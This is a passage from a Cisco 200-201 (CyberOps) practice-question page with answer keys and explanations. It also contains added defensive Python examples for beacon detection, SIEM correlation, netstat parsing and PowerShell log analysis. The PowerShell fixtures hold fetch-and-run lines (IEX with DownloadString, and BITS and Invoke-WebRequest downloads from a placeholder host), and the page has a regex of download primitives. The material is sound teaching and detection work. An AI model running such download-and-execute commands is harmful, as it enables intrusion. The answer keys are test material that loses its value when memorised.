Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


Cisco · Free Practice Questions · Last reviewed May 2026

200-201 Exam Questions and Answers

30 real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right and why the others are wrong.

95 exam questions
120 min time limit
Pass: Variable
5 exam domains
Exam domains:
1. Security Policies and Procedures
2. Security Concepts
3. Security Monitoring
4. Host-Based Analysis
5. Network Intrusion Analysis

Domain 1: Security Policies and Procedures

Q1 (medium)

A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?

A

Remote Access Policy violation

B

Incident Response Policy violation

C

Data Classification Policy violation

D

Acceptable Use Policy violation

Sharing credentials is a misuse of company resources, violating the Acceptable Use Policy.

Why: Sharing login credentials violates the Acceptable Use Policy (AUP), which defines how employees may use company systems and data. The AUP typically prohibits password sharing because it undermines non-repudiation and access control, as each user should have unique credentials for accountability. This is a direct breach of acceptable behavior, not a failure of remote access, incident response, or data classification procedures.
Q2 (easy)

A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?

A

Specify encryption standards for data at rest

B

List acceptable uses of company resources

C

Define mandatory reporting procedures and contact information

Clear procedures encourage timely reporting.

D

Require complex passwords for all accounts

Why: Option C is correct because the core purpose of an incident response policy is to ensure timely reporting. Without mandatory reporting procedures and clear contact information, employees may delay or fail to report security incidents, increasing dwell time and potential damage. This directly supports the incident response lifecycle (NIST SP 800-61) by establishing a clear chain of communication for initial detection and reporting.
Q3 (hard)

An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?

A

Allow encrypted traffic to bypass the IPS

B

Require all internal traffic to use unencrypted protocols

C

Implement SSL/TLS decryption at the network perimeter

Decryption enables the IPS to inspect encrypted payloads.

D

Exclude encrypted traffic from the security policy scope

Why: Option C is correct because implementing SSL/TLS decryption at the network perimeter lets the IPS inspect the plaintext of encrypted sessions. A dedicated decryption device (a next-generation firewall or forward proxy) terminates the client's TLS session, passes the cleartext to the inspection engine, and re-encrypts it toward the server, so threats hidden in HTTPS, SMTPS or other TLS-protected flows are detected without breaking the policy's requirement that all traffic be inspected. Decryption brings its own policy requirements: the inspection CA must be distributed to managed endpoints, categories such as banking or health traffic usually need an explicit exemption for legal and privacy reasons, and applications that pin certificates will break, so the policy should define those exclusions. Options A and D simply write the gap into the policy, and option B removes the protection that encryption provides.
Q4 (easy)

A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?

A

To support forensic investigations of security incidents

Logs provide evidence for post-incident analysis.

B

To improve system performance through log analysis

C

To comply with regulatory requirements only

D

To enable real-time monitoring of user behavior

Why: The primary purpose of retaining user activity logs for at least one year is to support forensic investigations of security incidents. When a breach or policy violation occurs, security analysts need historical log data to reconstruct the timeline of events, identify the initial compromise vector, and determine the scope of damage. Without long-term retention, critical evidence may be overwritten or purged before an incident is discovered, making root cause analysis impossible.
Q5 (hard)

A security analyst notices that an employee is accessing the corporate network from an unauthorized device. According to the security policy, which action should the analyst take first?

A

Report the employee to human resources for disciplinary action

B

Ignore the incident because it is a minor violation

C

Disable the device's network access immediately

Immediate containment is a typical first step.

D

Update the security policy to allow personal devices

Why: Option C is correct because the immediate priority when an unauthorised device is found on the corporate network is containment: cut its access so it cannot be used to reach data or spread malware while the investigation proceeds. This is the containment phase of the incident response process, and the security policy typically mandates it; technically it is done by quarantining the endpoint through 802.1X/NAC, MAC-based port security, or simply shutting the switch port. Reporting to HR (A) may follow later, ignoring the event (B) leaves the exposure open, and changing the policy (D) is not an incident response action.
Q6 (medium)

A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?

A

Need to know

B

Defense in depth

C

Separation of duties

Two-person rule prevents unauthorized changes.

D

Least privilege

Why: Requiring two administrators to approve firewall rule changes enforces separation of duties (also called the two-person rule): no single person can push a critical change alone, so an unauthorised or malicious rule would require either collusion or a reviewer's sign-off. In firewall management this is usually built into the change management workflow with distinct requester, approver and implementer roles. Need to know (A) and least privilege (D) limit what each individual can access, and defense in depth (B) layers independent controls; none of them addresses who approves a change.


Domain 2: Security Concepts

Q1 (easy)

An organization wants to classify data based on its sensitivity and impact if disclosed. Which security principle is being applied?

A

Defense in depth

B

Confidentiality, integrity, and availability (CIA)

Data classification directly supports confidentiality and integrity by applying appropriate controls.

C

Least privilege

D

Data loss prevention

Why: The organization's goal is to classify data based on sensitivity and impact if disclosed, which directly aligns with the confidentiality component of the CIA triad. Confidentiality ensures that sensitive information is accessed only by authorized individuals, and classification is the foundational step to enforce this principle. The CIA triad (Confidentiality, Integrity, Availability) is the core security model that governs how data is protected based on its value and risk.
Q2 (medium)

A SOC analyst notices repeated failed login attempts from a single IP address against multiple user accounts. Which type of attack is most likely occurring?

A

Credential stuffing

B

Brute force attack

C

Password spraying

Password spraying tries a few common passwords across many accounts.

D

Man-in-the-middle attack

Why: Password spraying (C) is correct: one source trying a small number of common passwords against many accounts is the pattern described, and it is chosen precisely to stay under per-account lockout thresholds. A brute force attack (B) has the opposite shape, many passwords against one account, which trips lockout quickly; credential stuffing (A) replays username and password pairs leaked from other breaches, so it looks like one attempt per account with a different password each time; a man-in-the-middle attack (D) intercepts traffic and produces no storm of failed logons. To confirm, count distinct accounts per source and attempts per account: spraying shows many accounts with only one or two attempts each inside the lockout window.
Q3 (hard)

A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?

A

Place both servers on the internal network with host-based firewalls

B

Place the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from DMZ to internal

DMZ isolates web server; blocking outbound from DMZ prevents pivot.

C

Use a VPN between the web server and database server

D

Place both servers on the same VLAN with a firewall between them

Why: Placing the web server in a DMZ and the database server on the internal network, with a firewall blocking traffic from the DMZ to the internal network, prevents an attacker who compromises the web server from initiating connections to internal hosts. This is a default-deny rule for DMZ-to-internal traffic, and the DMZ acts as a buffer zone that isolates publicly reachable services from sensitive internal resources. Note that most applications need the web tier to open the database connection, so the rule set in practice is default-deny from DMZ to internal plus a single explicit allow for the database port to the database host and nothing else; option B's point is the default-deny, which is what breaks the pivot to the rest of the internal network. Host-based firewalls alone (A) and a shared VLAN (D) leave the web server adjacent to internal systems, and a VPN (C) encrypts the path without restricting what the compromised host may reach.
Q4 (medium)

Which TWO security concepts are fundamental to the principle of least privilege? (Choose two.)

A

Role-based access control (RBAC)

RBAC implements least privilege by assigning permissions to roles.

B

Mandatory access control (MAC)

C

Need-to-know

Need-to-know restricts access to data required for tasks.

D

Separation of duties

E

Defense in depth

Why: Role-based access control (RBAC) is fundamental to the principle of least privilege because it assigns permissions based on job functions rather than individual users, ensuring users receive only the access necessary for their roles. The 'need-to-know' concept restricts access to information strictly required for a user's tasks, directly enforcing least privilege by limiting data exposure. Together, RBAC provides a scalable framework for access management, while need-to-know ensures granular data-level control.
Q5 (hard)

Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)

A

Slow network performance and service unavailability

Overwhelmed resources cause slowdowns.

B

A single IP address generating excessive traffic

C

High bandwidth consumption on the network link

DDoS floods the link with traffic.

D

Unusual traffic patterns from many different sources

Many sources indicate a distributed attack.

E

Encrypted traffic from a known malware C2 server

Why: Options A, C and D are correct. A DDoS attack directs traffic from many sources (a botnet or a set of reflectors) at a target, so the first symptoms are degraded performance and service unavailability (A) as the server, firewall or link saturates, together with abnormal bandwidth consumption on the upstream link (C) and traffic patterns such as SYN or UDP floods arriving from a large number of unrelated sources (D). That many-source pattern is the distributed part of the attack and is what makes simple IP-based filtering ineffective. A single IP generating excessive traffic (B) describes a plain DoS, not a distributed one, and encrypted traffic to a known C2 server (E) is an indicator of an infected host, not of a denial-of-service attack against it.
Q6 (easy)

Which TWO are goals of a security operations center (SOC)? (Choose two.)

A

Continuous monitoring of security events

SOC monitors events 24/7.

B

Managing user passwords

C

Developing software applications

D

Performing penetration tests

E

Responding to security incidents

Incident response is a primary SOC role.

Why: Options A and E are correct. Continuous monitoring (A) means collecting and correlating events from firewalls, IDS/IPS, endpoints and authentication systems so that indicators of compromise are detected as they occur; responding to incidents (E) is what that monitoring feeds, following the detection and analysis, containment, eradication and recovery phases of NIST SP 800-61. Password management (B) is an identity or help-desk function, software development (C) belongs to engineering teams, and penetration testing (D) is an offensive assessment normally performed by a red team or external assessors rather than by the SOC.


Domain 3: Security Monitoring

Q1 (easy)

An analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?

A

Search the SIEM for events with destination port 22 and source IP.

Directly retrieves SSH events for that IP.

B

Review all firewall logs for the past hour.

C

Run a packet capture on the server's network interface.

D

Check the server's auth.log file manually.

Why: Option A is correct because a SIEM indexes and correlates log data from multiple sources, allowing an analyst to quickly filter events by destination port 22 (SSH) and source IP without manually sifting through raw logs. This approach leverages the SIEM's search capabilities to retrieve only relevant events from the past hour, making it the most efficient method for targeted threat hunting.
Q2 (medium)

A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?

A

Change the IPS to fail-open mode.

B

Increase the number of IPS sensors.

C

Disable or modify signatures causing false positives.

Directly addresses the root cause of legitimate traffic being blocked.

D

Reduce the IPS sensitivity level to lower.

Why: Option C is correct because false positives occur when specific IPS signatures match legitimate traffic. The most direct tuning is to identify those signatures and disable them or narrow their match (by direction, address range or protocol state), which removes the unwanted blocking without weakening the rest of the rule set. Switching to fail-open (A) only changes what happens when the sensor itself fails, adding sensors (B) multiplies the same false positives, and lowering the global sensitivity (D) degrades every signature at once instead of the few that are wrong.
Q3 (hard)

An analyst is investigating a host that is beaconing to a known malicious domain every 60 seconds. The host also shows outbound connections to multiple IPs on port 443. To confirm the beaconing, which data source is most useful?

A

DNS logs from the internal DNS server.

B

NetFlow records from the border router.

Shows flow timestamps and destinations; reveals periodic connections.

C

Full packet capture of all outbound traffic.

D

Host-based firewall logs.

Why: NetFlow records from the border router give, for every flow, the source and destination address, port, protocol, start time and byte and packet counts, which is exactly what is needed to show that the host opens a connection to the same destination every 60 seconds and how many distinct port-443 peers it talks to. Unlike DNS logs, NetFlow records the connection itself whether or not a name was resolved (the beacon may use a hard-coded IP, a cached answer or DNS over HTTPS). Full packet capture (C) would confirm it too but is far heavier to collect and store, and the port-443 payload is encrypted anyway; host-based firewall logs (D) depend on an endpoint that may already be tampered with. Keep the DNS logs alongside the flows: NetFlow only shows IP addresses, so the DNS query is what ties the beacon back to the known malicious domain.
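As an added example (not from the page and not Cisco's material), this is the periodicity check an analyst would run over NetFlow-style records to confirm the 60-second beacon described above. The records, the host 10.1.1.25 and the peers 203.0.113.9 and 198.51.100.7 are constructed for the illustration; the metric is the coefficient of variation of the gaps between successive flow starts per (source, destination, port) pair.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed NetFlow-style records (not real capture data):
# (flow start, epoch seconds; source IP; destination IP; destination port; protocol)
JITTER = [0, 1, 0, 2, 1, 0, 1, 0, 2, 1]          # a real beacon is never perfectly regular
FLOWS = [
    # 10.1.1.25 contacts 203.0.113.9:443 every ~60 s (the suspected C2 beacon)
    *[(1_700_000_000 + 60 * i + j, "10.1.1.25", "203.0.113.9", 443, "tcp")
      for i, j in enumerate(JITTER)],
    # the same host browsing normally: irregular gaps to a CDN address
    (1_700_000_005, "10.1.1.25", "198.51.100.7", 443, "tcp"),
    (1_700_000_013, "10.1.1.25", "198.51.100.7", 443, "tcp"),
    (1_700_000_200, "10.1.1.25", "198.51.100.7", 443, "tcp"),
    (1_700_000_350, "10.1.1.25", "198.51.100.7", 443, "tcp"),
    (1_700_000_355, "10.1.1.25", "198.51.100.7", 443, "tcp"),
]


def beacon_candidates(flows, min_flows=5, max_cv=0.1):
    """Group flows by (src, dst, dport, proto) and measure how regular the gaps
    between successive flow starts are.  cv is the coefficient of variation
    (standard deviation / mean) of the inter-arrival times: a sleep-based
    beacon gives a cv close to 0, human browsing gives a cv near or above 1."""
    by_peer = defaultdict(list)
    for start, src, dst, dport, proto in flows:
        by_peer[(src, dst, dport, proto)].append(start)

    results = {}
    for key, starts in by_peer.items():
        if len(starts) < min_flows:        # too few samples to call anything periodic
            continue
        starts.sort()
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period else float("inf")
        results[key] = {
            "count": len(starts),
            "period_s": round(period, 1),
            "cv": round(cv, 3),
            "beacon": cv <= max_cv,
        }
    return results


if __name__ == "__main__":
    for (src, dst, dport, proto), r in beacon_candidates(FLOWS).items():
        flag = "BEACON" if r["beacon"] else "ok"
        print(f"{src} -> {dst}:{dport}/{proto}  n={r['count']} "
              f"period={r['period_s']}s cv={r['cv']}  {flag}")
```

Use flow start times rather than end times, because the exporter's active timeout splits long sessions into several records, and feed the flagged destination IP into the DNS logs to recover the domain it was resolved from.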
Q4 (easy)

A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?

A

Escalate to a senior analyst.

B

Run a full antivirus scan.

C

Isolate the host from the network.

Contains the threat and prevents spread.

D

Delete the file immediately.

Why: The correct first step is to isolate the host from the network (C) because the alert indicates active malware ('invoice.exe' in Downloads). Containment is the immediate priority in incident response to prevent lateral movement and data exfiltration. Isolating the host stops any ongoing C2 communication or propagation over the network, aligning with the NIST SP 800-61 containment strategy.
Q5 (medium)

A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?

A

The SIEM is receiving too many logs and dropping events.

B

The correlation rule threshold is set too high.

The number of failed attempts may be below the threshold.

C

The SIEM time zone is misconfigured.

D

The log source is not sending syslog data.

Why: A SIEM correlation rule for brute-force attacks typically triggers when the number of failed login attempts from a single source exceeds a defined threshold within a specific time window. If the threshold is set too high, the rule will not fire even though failed logins are occurring, because the count never reaches the required value. This is the most direct and common cause for a correlation rule not triggering when expected.
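Added example (not the page's own code): the two SIEM operations described in Q1 and Q5 of this domain, a targeted search by source IP and destination port, and a thresholded brute-force correlation rule, run over constructed normalised authentication events. The same data that fires the rule at a threshold of 5 failures in 300 seconds stays silent at a threshold of 10, which is the failure mode in Q5. All addresses, usernames and timestamps are constructed.

```python
from collections import deque
from datetime import datetime

# Constructed, SIEM-normalised authentication events (not real data).
# 203.0.113.44 fails eight times against SSH in under a minute, then succeeds.
ATTACKER = "203.0.113.44"
TARGET = "10.1.1.5"
EVENTS = [
    {"ts": "2026-05-01T09:10:00", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "root"},
    {"ts": "2026-05-01T10:00:05", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "root"},
    {"ts": "2026-05-01T10:00:12", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "admin"},
    {"ts": "2026-05-01T10:00:19", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "ubuntu"},
    {"ts": "2026-05-01T10:00:27", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "root"},
    {"ts": "2026-05-01T10:00:33", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "test"},
    {"ts": "2026-05-01T10:00:41", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "oracle"},
    {"ts": "2026-05-01T10:00:50", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "root"},
    {"ts": "2026-05-01T10:01:02", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "pi"},
    {"ts": "2026-05-01T10:01:10", "src_ip": ATTACKER, "dst_ip": TARGET, "dst_port": 22, "action": "success", "user": "pi"},
    {"ts": "2026-05-01T10:05:00", "src_ip": "198.51.100.9", "dst_ip": TARGET, "dst_port": 22, "action": "fail", "user": "jsmith"},
]


def search(events, src_ip, dst_port, since, until):
    """Targeted SIEM-style search: all events from one source to one service
    inside a time window.  since/until are ISO 8601 strings."""
    lo, hi = datetime.fromisoformat(since), datetime.fromisoformat(until)
    return [e for e in events
            if e["src_ip"] == src_ip and e["dst_port"] == dst_port
            and lo <= datetime.fromisoformat(e["ts"]) <= hi]


def brute_force_alerts(events, threshold, window_s):
    """Correlation rule: alert when one source produces at least `threshold`
    failed logons inside any sliding window of `window_s` seconds.  Returns
    {src_ip: alert} for the moment each source first crosses the line."""
    recent = {}      # src_ip -> deque of failure timestamps still inside the window
    alerts = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["action"] != "fail":
            continue
        t = datetime.fromisoformat(e["ts"])
        q = recent.setdefault(e["src_ip"], deque())
        q.append(t)
        while (t - q[0]).total_seconds() > window_s:    # drop failures that aged out
            q.popleft()
        if len(q) >= threshold and e["src_ip"] not in alerts:
            alerts[e["src_ip"]] = {"count": len(q), "first": q[0].isoformat(), "last": t.isoformat()}
    return alerts


if __name__ == "__main__":
    hits = search(EVENTS, ATTACKER, 22, "2026-05-01T10:00:00", "2026-05-01T11:00:00")
    print(f"{len(hits)} SSH events from {ATTACKER} in the last hour; last action: {hits[-1]['action']}")
    print("threshold 10/300s:", brute_force_alerts(EVENTS, threshold=10, window_s=300))
    print("threshold  5/300s:", brute_force_alerts(EVENTS, threshold=5, window_s=300))
```

The search also surfaces the success that follows the failures, which is the event that turns a noisy brute-force alert into a probable compromise; a second rule keyed on "success after N failures from the same source" is worth having alongside the threshold rule.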
Q6 (medium)

During an incident, an analyst needs to determine if a specific user account 'jsmith' was used from a remote IP during a breach window. Which log sources should the analyst check first?

A

NetFlow records from the core switch.

B

VPN concentrator logs.

C

File server audit logs.

D

Windows Security Event Logs (Event ID 4624, 4625).

Contains logon events with username and source IP.

Why: Windows Security Event Log Event IDs 4624 (successful logon) and 4625 (failed logon) are the authoritative record of logons on a Windows system. Each event carries the target account name (jsmith), the logon type (for example 3 for a network logon or 10 for RemoteInteractive/RDP), the source workstation name, the source network address and a timestamp, so they answer the question directly. Two caveats: the event is written on the machine where the logon was attempted, so for a domain account also check the domain controllers (4768 and 4771 for Kerberos, 4776 for NTLM validation), and the source address field can be "-" or a loopback address for console or local logons, in which case the VPN concentrator logs (B) become the next hop in the trail. NetFlow (A) has no usernames, and file server audit logs (C) show what was touched, not how the account got in.


Domain 4: Host-Based Analysis

Q1 (medium)

A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?

A

Run 'netstat -b' on the Windows host to display active connections with the associated process executable.

The -b flag shows the binary involved in creating each connection, directly correlating the connection to the process.

B

Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.

C

Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.

D

Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.

Why: Running 'netstat -b' on a Windows host prints each active connection followed by the name of the executable that created it, so a single command ties the outbound connection to the malicious IP to a specific process; add -o to get the PID as well and -n to skip name resolution. Two practical notes: -b requires an elevated prompt (otherwise netstat prints "Can not obtain ownership information"), and the output is a point-in-time snapshot, so a short-lived connection may already be gone. The firewall log (B) and the Event ID 4688 timeline (C) show addresses and process starts respectively, but not the link between them; Get-NetTCPConnection (D) does return an OwningProcess PID that can be joined to Get-Process, but it does not print the executable inline.
Q2 (hard)

Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?

A

svchost.exe (PID 1420) because it is connecting to an external IP on port 80.

B

cmd.exe (PID 2568) because it could be used to launch other processes.

C

powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.

PowerShell making an outbound HTTPS connection is atypical and often used for malicious purposes.

D

notepad.exe (PID 2344) because it is not expecting to make any network connections.

Why: powershell.exe (PID 2792) is the likely malicious process because it holds an established TCP/443 connection to the server the exhibit treats as external, 192.168.1.50 (note that this is an RFC 1918 private address, so in a real investigation it would be an internal host; the question treats it as external). PowerShell is routinely abused to download payloads and run command-and-control over HTTPS, where signature-based tools cannot see the payload. svchost.exe on port 80 (PID 1420) is normal for services such as Windows Update, and cmd.exe and notepad.exe hold no connection in the output. An outbound HTTPS session from PowerShell is not proof on its own: confirm with the parent process and command line (Event ID 4688 with command-line auditing enabled) and with Script Block Logging (Event ID 4104).
Q3 (easy)

A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)

A

netstat -anob

Shows active network connections with associated process IDs and executables.

B

tasklist /svc

Lists processes and their services, crucial for identifying running malware.

C

dir /s C:\Windows\System32\config

D

wevtutil qe System /c:10

E

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Why: Volatile data is the state that lives only in memory and disappears on reboot: network connections, running processes, open handles, logged-on users. `netstat -anob` lists every connection and listening port (-a) in numeric form (-n) with the owning PID (-o) and executable (-b, elevated prompt required), which exposes backdoor listeners and unauthorised outbound sessions. `tasklist /svc` lists every running process together with the services hosted in it, which is how a malicious service hiding inside a svchost.exe instance or a process with a look-alike name is spotted. The other options read persistent data that survives a reboot and can be collected later from the disk image: the registry hive files (C), the System event log (D) and the Run key persistence entries (E) matter to the investigation but are not volatile.
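Added example (not the page's own code): a parser for `netstat -anob` output that answers the three questions above in one pass, which process owns the connection to a given address, which service sits behind a svchost.exe entry, and which established connections belong to binaries that rarely have a legitimate reason to talk to the network. The output text, PIDs, addresses and process names are constructed to mirror the real column layout; the list of living-off-the-land binaries is an assumption for the example, not an exhaustive set.

```python
import re

# Constructed netstat -anob output (column layout as printed by Windows; the
# PIDs, addresses and processes are invented for the example).  After each
# connection line netstat prints the owning component: for svchost.exe the
# service name first, then the executable in brackets.
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  RpcSs
 [svchost.exe]
  TCP    10.1.1.25:49731        203.0.113.9:443        ESTABLISHED     2792
 [powershell.exe]
  TCP    10.1.1.25:49740        198.51.100.7:80        ESTABLISHED     1420
  CryptSvc
 [svchost.exe]
  TCP    10.1.1.25:49755        203.0.113.9:8443       TIME_WAIT       0
 Can not obtain ownership information
"""

# proto, local, foreign, optional state (UDP lines have none), pid
CONN_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")

# Binaries that seldom need their own outbound connection (assumed list for the example)
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "certutil.exe", "wscript.exe", "cscript.exe", "msbuild.exe"}


def parse_netstat(text):
    """Turn netstat -anob text into a list of connection dicts with exe/service filled in."""
    entries, current = [], None
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            current = {"proto": proto, "local": local, "remote": remote,
                       "state": state, "pid": int(pid), "exe": None, "service": None}
            entries.append(current)
            continue
        s = line.strip()
        if current is None or not s:          # header lines and blanks
            continue
        if s.startswith("[") and s.endswith("]"):
            current["exe"] = s[1:-1]
        elif s.startswith("Can not obtain"):  # netstat was not run elevated, or PID 0
            current["exe"] = "unknown (netstat not elevated)"
        else:
            current["service"] = s            # service hosted by svchost.exe
    return entries


def connections_to(entries, remote_ip):
    """Connections whose foreign address is remote_ip (port stripped; works for [v6]:port too)."""
    return [e for e in entries if e["remote"].rsplit(":", 1)[0] == remote_ip]


def suspicious_established(entries):
    """Established sessions owned by a LOLBin: worth a second look every time."""
    return [e for e in entries
            if e["state"] == "ESTABLISHED" and (e["exe"] or "").lower() in LOLBINS]


if __name__ == "__main__":
    entries = parse_netstat(NETSTAT_OUTPUT)
    for e in connections_to(entries, "203.0.113.9"):
        print(f"{e['remote']:<22} {e['state']:<12} pid={e['pid']:<6} {e['exe']}")
    for e in suspicious_established(entries):
        print(f"SUSPICIOUS: {e['exe']} (pid {e['pid']}) -> {e['remote']}")
```

On a live system feed the tool the real output (`netstat -anob > netstat.txt` from an elevated prompt) and pivot from the PID into `tasklist /svc` and the 4688 process-creation events to recover the parent and command line.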
Q4 (medium)

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

A

DNS amplification attack

B

ARP spoofing

C

Brute force attempt on Telnet service

Repeated connection attempts to TCP port 23 (Telnet) from one source are consistent with a brute-force tool or a scanner retrying the service.

D

ICMP flood attack

Why: The log shows repeated denied attempts from 10.0.0.2 to 10.0.0.1 on TCP port 23, the default Telnet port. Because the firewall denied them, no credential was actually tested; what the log proves is that one host keeps trying to reach the Telnet service, which is how a brute-force tool (or a scanner retrying) looks from the network. Of the options it is the only one consistent with TCP/23: DNS amplification is UDP/53, ARP spoofing happens below IP and produces no port-based deny, and an ICMP flood would not show a TCP port at all. To confirm brute force rather than scanning, check whether 10.0.0.2 also probes other ports and whether any attempts reached the Telnet daemon's own logs.
Q5 (hard)

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A

Examine the Windows Registry for Run keys to identify persistence mechanisms.

B

Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

C

Review prefetch files (.pf) to determine when PowerShell was last executed.

D

Analyze network connection logs to identify outbound connections to known malicious IPs.

Why: Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log (Script Block Logging) records the full text of every script block PowerShell compiles, including commands typed at the prompt and code that never touched disk. Since the suspicion is that PowerShell was used to download tools, these events are the most direct evidence: they contain the actual download command, whether Invoke-WebRequest, Net.WebClient DownloadString/DownloadFile or Start-BitsTransfer, together with the time and, for script files, the path. Caveats: long scripts are split across several 4104 events sharing one ScriptBlockId and must be reassembled; full logging has to have been enabled by policy, although PowerShell 5 and later logs blocks it considers suspicious even when it is off; and Prefetch (C) is disabled by default on Windows Server, so option C may yield nothing on this host. Run keys (A) show persistence and network logs (D) show destinations; neither shows what PowerShell executed.
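Added example (not the page's own code): reassembling fragmented Event ID 4104 records into whole script blocks and then searching them for download primitives. The EventData field names (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText, Path) are the real ones; the records themselves, the host, the 203.0.113.9 address and the timestamps are constructed, and one block is deliberately left incomplete to show how a partially rolled-over log is reported rather than dropped.

```python
import re
from collections import defaultdict

# Constructed Event ID 4104 records (Microsoft-Windows-PowerShell/Operational),
# reduced to the EventData fields that matter.  Long scripts are split across
# several events sharing one ScriptBlockId, numbered MessageNumber/MessageTotal.
# Hosts, paths, addresses and timestamps are invented for the example.
EVENTS_4104 = [
    {"TimeCreated": "2026-05-01T10:02:03", "ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\ops\\health.ps1",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"TimeCreated": "2026-05-01T10:04:11", "ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "Path": "",
     "ScriptBlockText": "$c = New-Object Net.WebClient; $u = 'http://203.0.113.9/t.ps1'; "},
    {"TimeCreated": "2026-05-01T10:04:11", "ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "Path": "",
     "ScriptBlockText": "IEX $c.DownloadString($u)"},
    {"TimeCreated": "2026-05-01T10:06:40", "ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "",
     "ScriptBlockText": "Start-BitsTransfer -Source http://203.0.113.9/m.exe -Destination C:\\Users\\Public\\m.exe"},
    # only part 1 of 3 survived (log rolled over): still reported, flagged incomplete
    {"TimeCreated": "2026-05-01T10:07:15", "ScriptBlockId": "d4", "MessageNumber": 1, "MessageTotal": 3,
     "Path": "",
     "ScriptBlockText": "Invoke-WebRequest -Uri http://203.0.113.9/x -OutFile "},
]

# Download primitives an analyst looks for first (assumed list, not exhaustive)
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|Net\.WebClient|\bcurl\b|\bwget\b)", re.IGNORECASE)


def reassemble(events):
    """Stitch fragmented 4104 events back into whole script blocks, keyed by ScriptBlockId."""
    chunks = defaultdict(dict)
    meta = {}
    for e in events:
        sbid = e["ScriptBlockId"]
        chunks[sbid][e["MessageNumber"]] = e["ScriptBlockText"]
        meta.setdefault(sbid, {"time": e["TimeCreated"], "path": e["Path"], "total": e["MessageTotal"]})
    blocks = {}
    for sbid, parts in chunks.items():
        text = "".join(parts[n] for n in sorted(parts))
        blocks[sbid] = {**meta[sbid], "text": text, "complete": len(parts) == meta[sbid]["total"]}
    return blocks


def download_activity(blocks):
    """Script blocks containing a download primitive, oldest first.  An empty Path
    means the code never existed as a file on disk (typed in, piped, or launched
    with -Command / -EncodedCommand), which is itself a finding."""
    hits = []
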